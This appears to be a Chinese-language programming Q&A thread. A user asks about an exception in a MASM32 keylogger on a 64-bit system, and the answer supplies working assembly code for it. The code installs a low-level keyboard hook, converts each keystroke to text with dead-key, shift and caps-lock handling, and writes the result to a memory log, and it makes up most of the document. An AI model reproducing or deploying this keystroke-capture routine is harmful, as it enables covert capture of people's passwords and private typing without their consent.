所以我尝试在我的 64 位处理器上使用 MASM32 制作键盘记录器 我正在使用 MASM32 sdk 与微软视觉工作室
但是在链接和所有内容之后我遇到了一个我不明白的异常
dll 文件也正确加载,并且 HookProc 也被正确调用
所以问题是
我在 64 位处理器上使用 32 位 setwindowsHookEx 是否会出现问题?
这是一个调用 SetWindowsHookExA 的 MASM32 示例。
invoke SetWindowsHookExA, WH_KEYBOARD_LL, addr KeyBoardProc, eax, 0
mov [hHook], eax
; --- Register Hot Key <Ctrl><Alt><F9> ---
invoke RegisterHotKey, NULL, 0aaabbbbh, MOD_CONTROL or MOD_ALT, VK_F9
; --- Close and cleanup ---
.WHILE TRUE
invoke GetMessage, addr msg,NULL,0,0
.BREAK .IF (!eax)
.IF msg.message==WM_HOTKEY
invoke MessageBox, NULL, addr MsgBoxTextA,addr MsgBoxCaption, MB_SYSTEMMODAL
.BREAK
.ENDIF
.ENDW
invoke UnhookWindowsHookEx,hHook
然后你需要一个KeyBoardProc,例如:
; lParam - A pointer to a KBDLLHOOKSTRUCT structure.
;
; typedef struct tagKBDLLHOOKSTRUCT {
; DWORD vkCode;
; DWORD scanCode;
; DWORD flags;
; DWORD time;
; ULONG_PTR dwExtraInfo;
; } KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT, *LPKBDLLHOOKSTRUCT;
KeyBoardProc PROC nCode:DWORD, wParam:DWORD, lParam:DWORD
LOCAL lpKeyState[MAXSIZE] :BYTE
LOCAL lpCharBuf[32] :BYTE
.IF (nCode < 0 || nCode == HC_NOREMOVE)
jmp next_hook
.ELSEIF (wParam == WM_KEYUP || wParam == WM_SYSKEYUP)
jmp next_hook
.ENDIF
; --- Is it a dead key? ---
mov esi, [lParam]
lodsd
invoke MapVirtualKey, eax, 2
and eax,2147483648 ; top bit set (dead key)
cmp eax,2147483648
jne not_dead_key
mov byte ptr[deadkey],1
jmp next_hook
not_dead_key:
mov esi, [lParam]
lodsd
cmp al, VK_LSHIFT
je next_hook
cmp al, VK_RSHIFT
je next_hook
cmp al, VK_CAPITAL
je next_hook
cmp al, VK_ESCAPE
je get_name_of_key
cmp al, VK_BACK
je get_name_of_key
cmp al, VK_TAB
je get_name_of_key
lea ebx, [lpKeyState]
invoke GetKeyboardState,ebx
invoke GetKeyState, VK_LSHIFT
xchg esi, eax ; save result in esi
invoke GetKeyState, VK_RSHIFT
or eax, esi ; al == 1 if either key is DOWN
mov byte ptr [ebx + 16], al ; toggle a shift key to on/off
invoke GetKeyState, VK_CAPITAL
mov byte ptr [ebx + 20], al ; toggle caps lock to on/off
; --- Skip over ToAscii to prevent diacritic destruction! ---
cmp byte ptr[deadkey],1
je get_name_of_key
to_ascii:
mov esi, [lParam]
lea edi, [lpCharBuf]
lodsd
xchg eax, edx
lodsd
invoke ToAscii,edx,eax,ebx,edi,00h
test eax, eax
jnz write_to_mem
get_name_of_key:
mov byte ptr[deadkey],0
mov esi, [lParam]
lodsd ; skip virtual key code
lodsd ; eax = scancode
shl eax, 16
xchg eax, ecx
lodsd ; extended key info
shl eax, 24
or ecx, eax
lea edi, [lpCharBuf]
mov byte ptr [edi],'['
inc edi
invoke GetKeyNameTextA,ecx,edi,32
invoke lstrlen,edi
mov byte ptr [edi+eax],']'
write_to_mem:
lea edi, [lpCharBuf]
cmp byte ptr [edi],0dh ; carriage return?
jne wtm
mov byte ptr [edi+1],0ah ; add linefeed, so logs are easier to read.
wtm:
invoke WriteToMem,1,edi
next_hook:
invoke CallNextHookEx, hHook, nCode, wParam, lParam
ret
KeyBoardProc ENDP